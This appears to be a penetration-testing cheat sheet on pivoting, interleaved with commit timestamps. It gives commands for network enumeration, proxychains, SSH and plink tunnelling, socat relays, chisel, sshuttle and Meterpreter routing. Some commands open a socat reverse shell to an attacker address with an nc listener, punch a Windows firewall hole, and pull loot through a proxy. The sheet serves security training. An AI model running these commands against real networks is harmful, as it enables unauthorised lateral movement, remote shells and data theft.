2022-11-11 01:15:07 +01:00
# Pivoting
2023-09-05 14:14:28 +02:00
In the realm of penetration testing, "pivoting" refers to the technique of using a compromised system or foothold within a target network to launch further attacks or gain deeper access into the network as a proxy for the attacker. It involves moving laterally within the network infrastructure by leveraging the compromised system as a stepping stone to reach more sensitive or valuable assets. Pivoting allows a penetration tester (or an attacker) to explore and exploit additional vulnerabilities and systems that may not be directly accessible from their initial point of entry.
2022-11-11 01:15:07 +01:00
## Enumeration
### Using material found on the machine and preinstalled tools
* `arp -a`
* `/etc/hosts` or `C:\Windows\System32\drivers\etc\hosts`
* `/etc/resolv.conf`
* `ipconfig /all`
* `nmcli dev show`
* [Statically compiled tools ](https://github.com/andrew-d/static-binaries.git )
### Scripting Techniques
```sh
for i in {1..255}; do (ping -c 1 192.168.0.${1} | grep "bytes from" &); done
for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>& 1 & & echo $i is open; done
```
* Using local tools through a proxy like `nmap`
## Tools
* Enumerating a network using native and statically compiled tools
### Proxychains / FoxyProxy
* In need of dynamic port forwarding execute a reverse proxy on the jumpserver to reach the attacker's proxychains
```sh
ssh < username > @$ATTACKER_IP -R 9050 -N
```
* Proxychains, e.g. scan target via nmap, or connect via nc through jump server
```sh
proxychains nc < IP > < PORT >
proychains nmap < IP >
proxychains ssh user@$TARGET_IP
proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS
proxychains wget http://$TARGET_IP:8000/loot.zip
```
* Use `/etc/proxychains.conf` or `./proxychains.conf` containing:
```sh
[ProxyList]
# add proxy here ...
# meanwhile
# defaults set to "tor"
socks4 127.0.0.1 9050
#socks5 127.0.0.1 1337
# proxy_dns
```
* FoxyProxy, choose proxy type, proxy IP and port in settings
### SSH port forwarding and tunnelling (primarily Unix)
* LocalPortForwarding
```sh
ssh -L $LOCAL_PORT:< IP_seen_from_Jumpserver > :< Port_seen_from_Jumpserver > < user > @< Jumpserver > -fN
```
* Another possibility to use the jumpserver directly on it's cli via `ssh <username>@<jumpserver> -L *:$LOCAL_PORT:127.0.0.1:80 -N` . One can connect now to the target via the jumpserver
* Tip: open port on windows target via
```sh
netsh advfirewall firewall add rule name="new port" dir=in action=allow protocol=TCP localport=%PORT%
```
* Dynamic Port Forwarding
```sh
ssh -D $PORT < user > @< Jumpserver > -fN
```
* Reverse Proxy, if there is an SSH client on the jumpserver but no SSH server via
```sh
ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT USERNAME@$ATTACKER_IP(local) -i $KEYFILE -fN
```
* Tip1: create a user on the attacker to receive the connection without compromising your own password
* Tip2: use `-N` to not receive an interactive shell. The attacking user does not necessarily have one on the target
### plink.exe (Windows)
* [latest version ](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html )
```sh
cmd.exe /c echo y | .\plink.exe -R < LocalPort > :< TargetIP > :< TargetPort > < user > @< Jumpserver > -i < key > -N
```
* Key generation
```sh
puttygen < keyfile > -o key.ppk
```
* Circumvention, described by [U.Y. ](https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d )
```sh
echo y | & .\plink.exe -ssh -l < MYUSERNAME > -pw < MYPASSWORD > -R < MYIP > :< MYPORT > :127.0.0.1:< TARGETPORT > < MYIP >
```
### Socat
2023-08-09 21:50:10 +02:00
#### Local PortForwarding via Socat
Open a local port (here 80) on a network interface
```sh
./socat TCP4-LISTEN:8080,fork TCP4:127.0.0.1:80
```
#### Open a reverse shell via Socat
2022-11-11 01:15:07 +01:00
* Reverse shell on target via
2023-08-09 21:50:10 +02:00
```sh
./socat tcp-l:8000 tcp:< attacker-IP > :443 &
```
* Attacking bind shell on attacker
```sh
sudo nc -lvnp 443
```
2022-11-11 01:15:07 +01:00
2023-08-09 21:50:10 +02:00
#### Jumpserver via Socat
2022-11-11 01:15:07 +01:00
2023-08-09 21:50:10 +02:00
* Relay on a jumpserver via
```sh
./socat tcp-l:33060,fork,reuseaddr tcp:< TargetIP > :3306 &
```
#### Quiet Port Forwarding Through a Relay Server via Socat
* On attacker
```sh
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
```
* On relay server
```sh
./socat tcp:< attacker-IP > :8001 tcp:< TargetIP > :< TargetPort > ,fork &
```
__Notes__: Open `localhost:8000` on the attacker's browser or curl it afterwards. Processes are backgrounded via `&` . Therefore, the process can be quit by using the corresponding bg number like `kill %1` .
2022-11-11 01:15:07 +01:00
2023-08-09 21:50:10 +02:00
#### Forward Local Port via Socat
2022-11-11 01:15:07 +01:00
* In need of a Download on target, expose a port on the attacker via relay
2023-08-09 21:50:10 +02:00
```sh
socat tcp-l:80,fork tcp:$ATTACKER_IP:80
```
2022-11-11 01:15:07 +01:00
### Chisel
* **Does not require SSH on target**
* Reverse Proxy
* Bind port on attacker
```sh
2023-02-14 21:05:04 +01:00
./chisel server --reverse --port < ListeningPort > &
2022-11-11 01:15:07 +01:00
```
* Reverse port on target/proxy
```sh
./chisel client < attacker-IP > :< attacker-Port > R:socks &
```
* `proxychains.conf` contains
```sh
[ProxyList]
socks5 127.0.0.1 < Listening-Port >
```
* Forward SOCKS Proxy
* Proxy/compromised machine
```sh
./chisel server -p < Listen-Port > --socks5
```
* On attacker
```sh
./chisel client < target-IP > :< target-Port > < proxy-Port > :socks
```
* Remote Port Forward
* On attacker
```sh
./chisel server -p < Listen-Port > --reverse &
```
* On forwarder
```sh
./chisel client < attacker-IP > :< attackerListen-Port > R:< Forwarder-Port > :< target-IP > :< target-Port > &
```
* Local Port Forwarding
* On proxy
```sh
./chisel server -p < Listen-Port >
```
* On attacker
```sh
./chisel client < Listen-IP > :< Listen-Port > < attacker-IP > :< target-IP > :< target-Port >
```
### sshuttle
* `pip install sshuttle`
* `sshuttle -r <user>@<target> <subnet/CIDR>`
* or automatically determined
```sh
sshuttle -r < user > @< target > -N
```
* Key based auth
```sh
sshuttle -r < user > @< target > --ssh-cmd "ssh -i < key > " < subnet / CIDR >
```
* Exclude servers via `-x` , for example the target/gateway server
### Meterpreter
* Meterpreter with payload `set payload linux/x64/meterpreter_reverse_tcp` after successful connection do
```sh
portfwd add -l 22 -p 22 -r 127.0.0.1
```
#### Meterpreter add Subnet Route
```sh
run get_local_subnets
background
route add 10.1.1.0 255.255.255.0 1
2022-12-12 20:03:55 +01:00
route add 172.10.0.1/32 -1
2022-11-11 01:15:07 +01:00
route print
```
* Or use `load auto_add_route` from [rapid7's documentation ](https://www.rapid7.com/blog/post/2010/02/09/automatically-routing-through-new-subnets/ )
#### Meterpreter Auto Routing
* Upload payload and catch it with `multi/handler`
```
background
use post/multi/manage/autoroute
set session 1
set subnet < 10.0.0.0 >
run
```
#### Meterpreter Proxy Routing
* Specify socks proxy via
```sh
use auxiliary/server/socks_proxy
```
* Set proxychain on attacker accordingly
2022-12-12 20:03:55 +01:00
```sh
run srvhost=127.0.0.1 srvport=9050 version=4a
curl --proxy socks4a:localhost:9050
proxychains -q nmap 10.10.47.11
```
2022-11-11 01:15:07 +01:00
### rpivot
* [klsecservices' repo ](https://github.com/klsecservices/rpivot.git )
* [Their windows binary release ](https://github.com/klsecservices/rpivot/releases/tag/v1.0 )
## Links
* [Shadowmove at the adepts of 0xcc ](https://adepts.of0x.cc/shadowmove-hijack-socket/ )